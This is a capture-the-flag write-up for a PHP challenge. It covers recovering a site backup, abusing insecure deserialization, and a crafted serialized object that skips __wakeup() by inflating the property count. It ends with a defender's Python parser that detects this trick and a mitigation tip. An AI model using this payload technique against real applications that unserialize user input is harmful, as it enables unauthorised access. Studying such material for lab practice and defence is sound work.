Challenge description: "Because my cat keeps jumping all over my keyboard, I have the good habit of backing up my website. That's just how I am!!!"
![Image 1 - [极客大挑战 2019]PHP - 安全小天地](https://img.godyu.com/2023/12/20231226130333552.png?imageView2/0/format/webp/q/75)
This is just a backup-file scan; dirb or any similar tool works. After some testing, the backup file turns out to be www.zip.

Append www.zip to the URL to download the site backup. Unzipping it reveals three PHP files; go through them one by one.
![Image 2 - [极客大挑战 2019]PHP - 安全小天地](https://img.godyu.com/2023/12/20231226210334802.png?imageView2/0/format/webp/q/75)
The flag inside the downloaded flag.php is obviously not the real answer, so keep looking. The important file is class.php: it defines PHP magic methods, which points to a PHP deserialization vulnerability.
## flag.php

```php
<?php
$flag = 'Syc{dog_dog_dog_dog}';
?>
```
## class.php

```php
<?php
include 'flag.php';
error_reporting(0);

class Name {
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username, $password) {
        $this->username = $username;
        $this->password = $password;
    }

    // Runs right after unserialize() and overwrites whatever username was supplied
    function __wakeup() {
        $this->username = 'guest';
    }

    // Runs when the object is destroyed; loose comparison with 100, strict comparison with 'admin'
    function __destruct() {
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username; echo "</br>";
            echo "You password is: ";
            echo $this->password; echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        } else {
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();
        }
    }
}

// Appended by the writeup's author to generate the serialized string (see below)
$a = new Name('admin', 100);
$b = serialize($a);
var_dump($b);
?>
```
index.php includes class.php and unserializes the user input. After unserialization, `__wakeup()` is called and overwrites the supplied username. A simple approach is to create an object directly below the class definition and serialize it:

```php
$a = new Name('admin', 100);
$b = serialize($a);
var_dump($b);
```
![Image 3 - [极客大挑战 2019]PHP - 安全小天地](https://img.godyu.com/2023/12/20231226210335879.png?imageView2/0/format/webp/q/75)
Then, to bypass `__wakeup()`, change the property count after `"Name"` to 3, one more than the object actually has. Because `username` and `password` are private properties, their serialized names carry the class name wrapped in invisible NUL bytes, which get lost when you copy the dumped string, so they have to be put back as `%00`.

Final payload:

```
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
```
![Image 4 - [极客大挑战 2019]PHP - 安全小天地](https://img.godyu.com/2023/12/20231226210336850.png?imageView2/0/format/webp/q/75)
Submitting it yields the flag: flag{a2b4de76-c0d9-40fe-be16-46f06741eeea}
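As an added, defender-side illustration that is not part of the original writeup: a small Python parser for PHP's serialization format that reads the payload above (with `%00` URL-decoded to real NUL bytes, the form `unserialize()` receives), unmangles the private property names, and flags the mismatch between the declared property count and the members actually present, which is exactly what makes affected PHP versions skip `__wakeup()`. The sample string is constructed from the writeup's payload; `PhpObject`, `parse`, `unmangle` and `audit` are names chosen here.

```python
from dataclasses import dataclass, field

# Constructed sample: the writeup's payload with %00 decoded to real NUL bytes,
# i.e. the string unserialize() actually receives on the server.
SAMPLE_PAYLOAD = ('O:4:"Name":3:{s:14:"\x00Name\x00username";s:5:"admin";'
                  's:14:"\x00Name\x00password";i:100;}')

@dataclass
class PhpObject:
    cls: str
    declared: int                       # property count written in the O:...:<n>: header
    props: dict = field(default_factory=dict)

def parse(data: str, pos: int = 0) -> tuple:
    """Parse one serialized value at pos; returns (value, next_pos). Handles N, i, b, d, s, O."""
    t = data[pos]
    if t == 'N':                                      # N;
        return None, pos + 2
    if t in 'ibd':                                    # i:123;  b:1;  d:1.5;
        end = data.index(';', pos)
        conv = {'i': int, 'b': lambda x: x == '1', 'd': float}[t]
        return conv(data[pos + 2:end]), end + 1
    if t == 's':                                      # s:<len>:"<bytes>";
        colon = data.index(':', pos + 2)
        start, length = colon + 2, int(data[pos + 2:colon])
        return data[start:start + length], start + length + 2
    if t == 'O':                                      # O:<len>:"<class>":<count>:{...}
        colon = data.index(':', pos + 2)
        name_end = colon + 2 + int(data[pos + 2:colon])
        cnt_end = data.index(':', name_end + 2)
        obj = PhpObject(data[colon + 2:name_end], int(data[name_end + 2:cnt_end]))
        pos = cnt_end + 2
        while data[pos] != '}':                       # members are read up to the brace,
            key, pos = parse(data, pos)               # regardless of the declared count
            obj.props[key], pos = parse(data, pos)
        return obj, pos + 1
    raise ValueError(f"unsupported type tag {t!r} at offset {pos}")

def unmangle(key: str) -> tuple:
    r"""Undo PHP's name mangling: "\0Class\0name" is private, "\0*\0name" is protected."""
    if key.startswith('\x00'):
        _, scope, name = key.split('\x00', 2)
        return ('protected' if scope == '*' else f'private:{scope}'), name
    return 'public', key

def audit(data: str) -> dict:
    """Summarise an object; wakeup_bypass is True when the header count disagrees with the members."""
    obj, _ = parse(data)
    return {'class': obj.cls, 'wakeup_bypass': obj.declared != len(obj.props),
            'properties': {unmangle(k): v for k, v in obj.props.items()}}
```

On the server side, passing `['allowed_classes' => false]` as the second argument to `unserialize()` (PHP 7+) keeps untrusted input from instantiating classes such as `Name` at all, so neither `__wakeup()` nor `__destruct()` ever runs on attacker data.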